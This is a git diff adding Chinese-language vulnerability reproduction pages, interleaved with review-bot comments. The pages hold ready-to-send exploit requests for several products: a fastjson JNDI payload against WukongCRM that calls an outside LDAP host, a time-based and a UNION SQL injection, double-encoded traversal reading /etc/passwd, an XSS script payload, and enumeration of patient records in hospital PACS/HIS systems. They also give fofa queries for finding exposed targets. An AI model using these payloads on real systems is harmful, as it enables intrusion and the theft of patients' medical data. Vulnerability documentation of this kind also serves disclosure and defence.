+1,34 @@ +# 悟空CRM9.0 存在fastjson远程代码执行漏洞(CVE-2024-23052) + +# 一、漏洞简介 + WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 中的一个问题允许远程攻击者通过 fastjson 组件中的 parseObject() 函数执行任意代码。 + +# 二、影响版本 ++ 悟空CRM9.0 + +# 三、资产测绘 +```plain +"悟空CRM" +``` + +![1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118.png](./img/BBNca4tVgBc5_XpL/1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118-556380.png) + +# 四、漏洞复现 +```http +POST /CrmCustomer/queryPageList HTTP/1.1 +Host: +Content-Length: 93 +Content-Type: application/json;charset=UTF-8 +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 +Connection: close + +{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://pnftrxqvct.dgrh3.cn"}" +``` + +![1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3.png](./img/BBNca4tVgBc5_XpL/1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3-200256.png) + + + +> 更新: 2024-08-12 17:16:00 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gm114v8t0b3st6u7> \ No newline at end of file 
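Review bot: 急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md is structurally inconsistent with the rest of the commit: no 影响版本 section, no 更新/原文 footer, and both the fofa query and the HTTP request are fenced as ```javascript. On content, `wasmres=./../web.config` shows a one-level traversal out of the `dcwriter/thirdpart` directory; state the impact explicitly (web.config normally holds connection strings and machine keys) and the fix (resolve `wasmres` against the intended directory and reject any resolved path outside it).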
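Review bot: The JSON body in 悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md ends with a stray `"` after the closing brace (`"AsText":"ldap://pnftrxqvct.dgrh3.cn"}"`), which makes it invalid JSON; drop it. `ldap://pnftrxqvct.dgrh3.cn` is the author's own out-of-band logging domain and should be replaced with a placeholder such as `ldap://{{oob-domain}}`. The 资产测绘 block is the bare string "悟空CRM" with no engine or field named, and the precise affected build `v.72crm_9.0.1_20191202` from 漏洞简介 belongs under 影响版本 instead of the vague 悟空CRM9.0. No mitigation is given; the standard one is upgrading fastjson and enabling safeMode so `@type` autoType resolution is disabled.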
diff --git a/悦库网盘aRegisAdmin存在SQL注入漏洞.md b/悦库网盘aRegisAdmin存在SQL注入漏洞.md new file mode 100644 index 0000000..85f817d --- /dev/null +++ b/悦库网盘aRegisAdmin存在SQL注入漏洞.md 
@@ -0,0 +1,52 @@ +# 悦库网盘aRegisAdmin存在SQL注入漏洞 + +# 一、漏洞简介 +悦库网盘系统是一款功能强大的云存储平台,提供安全可靠的文件存储、共享和管理解决方案。该系统具有灵活的存储容量、文件同步、多终端访问等特性,支持跨平台的文件分享和团队协作。悦库网盘系统采用先进的加密技术确保数据安全,并提供了用户友好的界面和多样化的权限管理功能,满足个人用户、企业团队和教育机构的不同需求。悦库网盘aRegisAdmin存在SQL注入漏洞 + +# 二、影响版本 ++ 企慧通教育系统 + +# 三、资产测绘 ++ fofa`<font style="color:rgb(51, 51, 51);">app=</font><font style="color:rgb(221, 17, 68);">"悦库-悦库网盘"</font>` + +![1718298354037-b753585e-1dcd-4e0b-8eec-1400ed166620.png](./img/WtGy-d6GGtrILpmK/1718298354037-b753585e-1dcd-4e0b-8eec-1400ed166620-817530.png) + +# 四、漏洞复现 +```java +POST /user/login/.html HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Cookie: windowWidth=1036; windowHeight=846; yid=4m6jbq6mrd5mui6ul2gr3s9fl4; lang=zh-cn; device=desktop; theme=default +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Content-Length: 154 + +account=admin') AND (SELECT 4215 FROM (SELECT(SLEEP(5)))CFVi)-- WUij&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918&clientId=5E9B11EB90214398ADA353DF7F014E9C&referer=&keepLogin=false +``` + +![1718298437044-3bce6637-6009-4b59-b1e6-66eb178f5df4.png](./img/WtGy-d6GGtrILpmK/1718298437044-3bce6637-6009-4b59-b1e6-66eb178f5df4-331145.png) + +```java +POST /user/login/.html HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Cookie: windowWidth=1036; windowHeight=846; yid=4m6jbq6mrd5mui6ul2gr3s9fl4; lang=zh-cn; device=desktop; theme=default +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Content-Length: 154 + 
+account=admin&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918&clientId=5E9B11EB90214398ADA353DF7F014E9C&referer=&keepLogin=false +``` + +![1718298399701-682e6608-1c88-42b2-8c9e-60bfd0a3b5a3.png](./img/WtGy-d6GGtrILpmK/1718298399701-682e6608-1c88-42b2-8c9e-60bfd0a3b5a3-686633.png) + + + +> 更新: 2024-06-17 09:34:03 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iqb1350wkn2bu5qd> \ No newline at end of file diff --git a/惠尔顿安全审计系统download任意文件读取漏洞.md b/惠尔顿安全审计系统download任意文件读取漏洞.md new file mode 100644 index 0000000..a6a6c4b --- /dev/null +++ b/惠尔顿安全审计系统download任意文件读取漏洞.md @@ -0,0 +1,32 @@ +# 惠尔顿安全审计系统download任意文件读取漏洞 + +# 一、漏洞简介 +对于军民融合政策的诸多中小企业来讲,大部分人员主要时间都时在非涉密区工作,并需要用到网络, 所以上网时不小心泄密成了一个可能泄密的高概率事件。 惠尔顿 通过 三员化管理、实名认证上网、网页记录、 邮件审查、文件上传下载、即时通讯、防私接、统计报表 等八大方面确保上网不泄密。惠尔顿网络安全审计系统download接口处存在任意文件读取漏洞,恶意攻击者可能会利用此漏洞获取服务器敏感信息,从而造成信息泄露。 + +# 二、影响版本 ++ 惠尔顿安全审计系统 + +# 三、资产测绘 ++ fofa`app="惠尔顿-网络安全审计系统"` ++ 特征 + +![1708966359810-2fd7ba60-d5c3-42c3-9dcd-43cffca13a4a.png](./img/Ed_k3Vej_OmbWTmK/1708966359810-2fd7ba60-d5c3-42c3-9dcd-43cffca13a4a-045633.png) + +# 四、漏洞复现 +```plain +GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1708966387262-824b2693-8e0c-4b28-8490-9108265f6ba3.png](./img/Ed_k3Vej_OmbWTmK/1708966387262-824b2693-8e0c-4b28-8490-9108265f6ba3-592859.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbrwp07p75ysgyvt> \ No newline at end of file diff --git a/懒人网址导航系统search存在SQL注入漏洞.md b/懒人网址导航系统search存在SQL注入漏洞.md new file mode 100644 index 0000000..fbb0945 --- /dev/null +++ b/懒人网址导航系统search存在SQL注入漏洞.md 
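Review bot: 影响版本 in 悦库网盘aRegisAdmin存在SQL注入漏洞.md lists "企慧通教育系统", a different product, which must be a copy-paste leftover; it should name 悦库网盘. The title says `aRegisAdmin` but both requests go to `/user/login/.html` with an `account` parameter, so explain where `aRegisAdmin` comes in or correct the title. The first request's `Content-Length: 154` is the length of the second (benign) body, not of the injected one; the fofa query line embeds `<font>` HTML inside a code span; the `yid=...` session cookie is the author's own and should be removed. It is also worth stating that `password=8c6976e5...a918` is simply SHA-256 of "admin", so readers do not take it for a required value.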
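Review bot: The request in 惠尔顿安全审计系统download任意文件读取漏洞.md uses double URL-encoding (`%252F` rather than `%2F`), which tells the reader that the `download` handler decodes the path twice; the page should say so explicitly, because that is the detail a WAF rule or the vendor fix has to account for (decode fully, then reject any `..` segment before touching the filesystem). The 漏洞简介 is mostly vendor marketing and contains the typo 时在 (should be 是在); trim it to what the bug is and add the mitigation line that the other pages also lack.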
@@ -0,0 +1,29 @@ +# 懒人网址导航系统search存在SQL注入漏洞 + +# 一、漏洞简介 +懒人网址导航系统是一种智能化的网址导航平台,旨在帮助用户快速找到所需的网址和资源。该系统提供了以下功能和特点:该系统提供了智能化的网址搜索和推荐功能,能够根据用户的搜索习惯和偏好推荐相关的网址和资源。同时,系统还提供了网址分类、网址收藏和网址分享等功能,方便用户管理和共享网址。懒人网址导航系统存在SQL search接口处存在注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +# 二、影响版本 ++ 懒人网址导航系统 + +# 三、资产测绘 ++ fofa`"./templates/antidote/css/style.css` + +![1716364321581-c970a718-1a58-4d66-a24d-bbd5fb071411.png](./img/rmkV4XQtbb9HiW41/1716364321581-c970a718-1a58-4d66-a24d-bbd5fb071411-052360.png) + +# 四、漏洞复现 +```plain +GET /search.php?keyword=' UNION ALL SELECT CONCAT(IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bypass HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1716364584387-8647dcda-d556-49e4-ac66-a177fda54135.png](./img/rmkV4XQtbb9HiW41/1716364584387-8647dcda-d556-49e4-ac66-a177fda54135-837041.png) + + + +> 更新: 2024-05-23 13:30:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nugh9v1qorh6l3wt> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md new file mode 100644 index 0000000..f45e844 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md 
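Review bot: The fofa query in 懒人网址导航系统search存在SQL注入漏洞.md has an unbalanced quote (`"./templates/antidote/css/style.css` with no closing `"`), so it will not paste into the search engine as written. The 漏洞简介 sentence "存在SQL search接口处存在注入漏洞" is garbled; it should read that the `keyword` parameter of `search.php` is injectable. The request is a 19-column UNION SELECT of `CURRENT_USER()`, i.e. a read, while the prose claims records can be added, deleted or modified; either state the read impact or justify the write claim, and add the fix (parameterise the keyword query).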
@@ -0,0 +1,67 @@ +# 成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 + - 成都信通网易医疗科技发展有限公司HIS系统(基于电子病历的医院信息化平台) + +# 三、特征 +![1700650007533-e9496b7e-969f-4370-b652-44a251239e7b.png](./img/6tHPnbfRiahtTPoM/1700650007533-e9496b7e-969f-4370-b652-44a251239e7b-380998.png) + +# 四、漏洞复现 + 1. 漏洞位置 + +在下列`nzzManager`接口下的`getContractSource`参数 + +```plain +/xtHisService/services +``` + +![1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf.png](./img/6tHPnbfRiahtTPoM/1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf-935835.png) + + 2. 使用burp抓包,使用wsdl插件解析 + +```plain +/xtHisService/services/nzzManager?wsdl +``` + +[wsdler.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222128209-b940588a-42dd-4499-95bf-a6da305a86b9.jar) + +![1700650674347-50992ebb-210b-4f8e-b50a-640b554118ea.png](./img/6tHPnbfRiahtTPoM/1700650674347-50992ebb-210b-4f8e-b50a-640b554118ea-682866.png) + + 3. 
数据包 + +```plain +POST /xtHisService/services/nzzManager HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=0A4C07C0C8A7CFF9A03AD7B586FFCBBE +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: xx.xx.xx.xx +Content-Length: 322 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imp="http://imp.nzz.ws.manager.cdxt.com/"> + <soapenv:Header/> + <soapenv:Body> + <imp:getContractSource> + <!--type: string--> + <arg0>gero et</arg0> + </imp:getContractSource> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1700650212974-87278389-d1ea-42ba-a89b-bbff759a26ed.png](./img/6tHPnbfRiahtTPoM/1700650212974-87278389-d1ea-42ba-a89b-bbff759a26ed-659778.png) + +![1700650253954-e7f0aa6b-9253-468a-91c0-007f4e540ea6.png](./img/6tHPnbfRiahtTPoM/1700650253954-e7f0aa6b-9253-468a-91c0-007f4e540ea6-514866.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ia05az6it1imevtb> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md new file mode 100644 index 0000000..65f3821 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md 
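Review bot: 成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md describes `getContractSource` as a 参数 of the `nzzManager` interface, but in the SOAP envelope it is the operation and the injectable value is `<arg0>`; say so. The envelope still carries the wsdler sample `gero et` in `<arg0>`, so the text shows no injection and what distinguishes a vulnerable response is only in the screenshots; state the observed behaviour. The `Cookie: JSESSIONID=0A4C07C0...` line is a real session and should be removed, and the remediation (bind `arg0` as a parameter in the nzzManager query) is missing.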
@@ -0,0 +1,63 @@ +# 成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司HIS系统(基于电子病历的医院信息化平台) + +# 三、特征 +![1700650007533-e9496b7e-969f-4370-b652-44a251239e7b.png](./img/KK9xFI075kSNF6Fs/1700650007533-e9496b7e-969f-4370-b652-44a251239e7b-375656.png) + +# 四、漏洞复现 +1. 漏洞位置 + +在下列`nzzManager`接口下的`getContract`参数 + +```plain +/xtHisService/services +``` + +![1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf.png](./img/KK9xFI075kSNF6Fs/1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf-255827.png) + +2. 使用burp抓包,使用wsdl插件解析 + +```plain +/xtHisService/services/nzzManager?wsdl +``` + +[wsdler.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222128291-9f1e688c-83d7-4634-9a48-af60d6d18b6e.jar)![1700650603699-766cdcf1-430c-4376-a4a0-6ef8acf31042.png](./img/KK9xFI075kSNF6Fs/1700650603699-766cdcf1-430c-4376-a4a0-6ef8acf31042-159137.png) + +3. 
数据包 + +```plain +POST /xtHisService/services/nzzManager HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=0A4C07C0C8A7CFF9A03AD7B586FFCBBE +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: xx.xx.xx.xx +Content-Length: 314 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imp="http://imp.nzz.ws.manager.cdxt.com/"> + <soapenv:Header/> + <soapenv:Body> + <imp:getContract> + <!--type: string--> + <arg0>gero et</arg0> + </imp:getContract> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1700650531584-d9202bd2-3b4c-4680-8f6f-540bbd12bd17.png](./img/KK9xFI075kSNF6Fs/1700650531584-d9202bd2-3b4c-4680-8f6f-540bbd12bd17-060263.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tn4e1b9rtiep13x8> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md new file mode 100644 index 0000000..e104615 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md 
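Review bot: Same issues as the getContractSource page: `getContract` is the SOAP operation, not a 参数; `<arg0>gero et</arg0>` is the wsdler sample value, so no injection is actually shown in the text; the `JSESSIONID` cookie should be removed. Additionally the `[wsdler.jar](...)` link and the following image are run together on one line, so the image does not render as its own block. Since this page and the getContractSource page differ only in the operation name, consider merging them into one page that lists both operations with the single fix (parameterise the queries behind nzzManager).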
@@ -0,0 +1,22 @@ +# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统) + +# 三、特征 +![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/SVgl4MzaEBYH3VYX/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-874139.png) + +# 四、漏洞复现 +```plain +/XtWebPacsASp/XTWebPacsGetJcbgByDabh.asp?dabh=1 +``` + +![1700651304147-bb52a220-c2d7-4841-af18-c0e7aec6ef2a.png](./img/SVgl4MzaEBYH3VYX/1700651304147-bb52a220-c2d7-4841-af18-c0e7aec6ef2a-114819.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oq3n3kbupmwuhibq> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md new file mode 100644 index 0000000..bc60b92 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md 
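Review bot: The 漏洞复现 of 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md is just `/XtWebPacsASp/XTWebPacsGetJcbgByDabh.asp?dabh=1`, a normal request; nothing in the text shows `dabh` being injectable, and the 信息泄露 page later in this commit uses the identical URL. Either add what was observed (error text, delay, differing response) or fold this into the 信息泄露 page; the remediation (parameterised query plus authentication on the endpoint) covers both.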
@@ -0,0 +1,36 @@ +# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统) + +# 三、特征 +![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/YR1LQosHaWEWoTsy/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-934372.png) + +# 四、漏洞复现 +```plain +POST /JcbgForYsz/Show_Jcbg_Ysz.asp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 162 +Connection: close +Cookie: ASPSESSIONIDCSBBQDTQ=KAJHGCOCOODELKOELMFGEMMK +Upgrade-Insecure-Requests: 1 + +edtJclx=%A3%C2%D0%CD%B3%AC%C9%F9&edtQsrq=2023-10-17&edtJsrq=2023-10-17&edtBgzt=%D2%D1%D4%A4%D4%BC&edtZwxm=&edtSjks=%B1%BE%D4%BA%CC%E5%BC%EC&edtSubmit=%B2%E9%D1%AF +``` + +![1700651676241-d3392ad1-f0ea-486a-a6fa-50b796736354.png](./img/YR1LQosHaWEWoTsy/1700651676241-d3392ad1-f0ea-486a-a6fa-50b796736354-334387.png) + + + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cggv50rtx7k19pah> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md new file mode 100644 index 0000000..9f08e39 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md 
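Review bot: The POST in 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md is the plain form submission (`edtJclx=%A3%C2%D0%CD%B3%AC%C9%F9` is GBK percent-encoded text, not an injection string), so the page does not demonstrate the injection it is named after; the evidence is only in the screenshot. State what was sent in `edtJclx` and what came back, and note the GBK encoding, since a detection rule has to decode it before matching. The `Cookie: ASPSESSIONIDCSBBQDTQ=...` value is a real session cookie and should be removed; `Content-Length: 162` does match the body shown.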
@@ -0,0 +1,30 @@ +# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统) + +# 三、特征 +![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/rrHqPXIKH46qSxgA/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-836936.png) + +# 四、漏洞复现 +漏洞位置 + +```plain +/JcbgForYsz/Show_Jcbg_Ysz.asp +``` + +1. 在姓名处插入如下payload:`test"><script>alert("XSS")</script>` + +![1700651459328-174f0fec-121d-4ec8-9787-77be487b9e62.png](./img/rrHqPXIKH46qSxgA/1700651459328-174f0fec-121d-4ec8-9787-77be487b9e62-804740.png) + +2. 点击查询,成功触发: + +![1700651521093-e0cef71d-5ae0-42d3-886b-78b0bb847be8.png](./img/rrHqPXIKH46qSxgA/1700651521093-e0cef71d-5ae0-42d3-886b-78b0bb847be8-116149.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qno6ghgn37fbk4dg> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md new file mode 100644 index 0000000..300a169 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md 
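Review bot: The XSS page names 姓名 as the injection point but not the form field; the preceding edtJclx page shows the same `/JcbgForYsz/Show_Jcbg_Ysz.asp` form with `edtZwxm` as the name field, so reference it. Whether the script is reflected in the query result or stored should be stated, because the two need different fixes (output encoding in the result page vs. validation on write). Since the endpoint is also listed as unauthenticated in a later page, the fact that no login is needed belongs in 漏洞简介.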
@@ -0,0 +1,24 @@ +# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞,攻击者可通过该漏洞获取病人敏感个人信息。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统) + +# 三、特征 +![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/x4f4ob5WjwPleqb3/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-670797.png) + +# 四、漏洞复现 +可通过遍历`dabh`参数获取敏感信息 + +```plain +/XtWebPacsASp/XTWebPacsGetJcbgByDabh.asp?dabh=1 +``` + +![1700651190860-700100b3-eeeb-4a3d-b6d1-dae525636f57.png](./img/x4f4ob5WjwPleqb3/1700651190860-700100b3-eeeb-4a3d-b6d1-dae525636f57-945427.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/il1v7mdgbkmg93tx> \ No newline at end of file diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md new file mode 100644 index 0000000..ce065e9 --- /dev/null +++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md @@ -0,0 +1,22 @@ +# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞 + +# 一、漏洞简介 +成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞,攻击者可通过该漏洞获取病人敏感个人信息。 + +# 二、影响版本 ++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统) + +# 三、特征 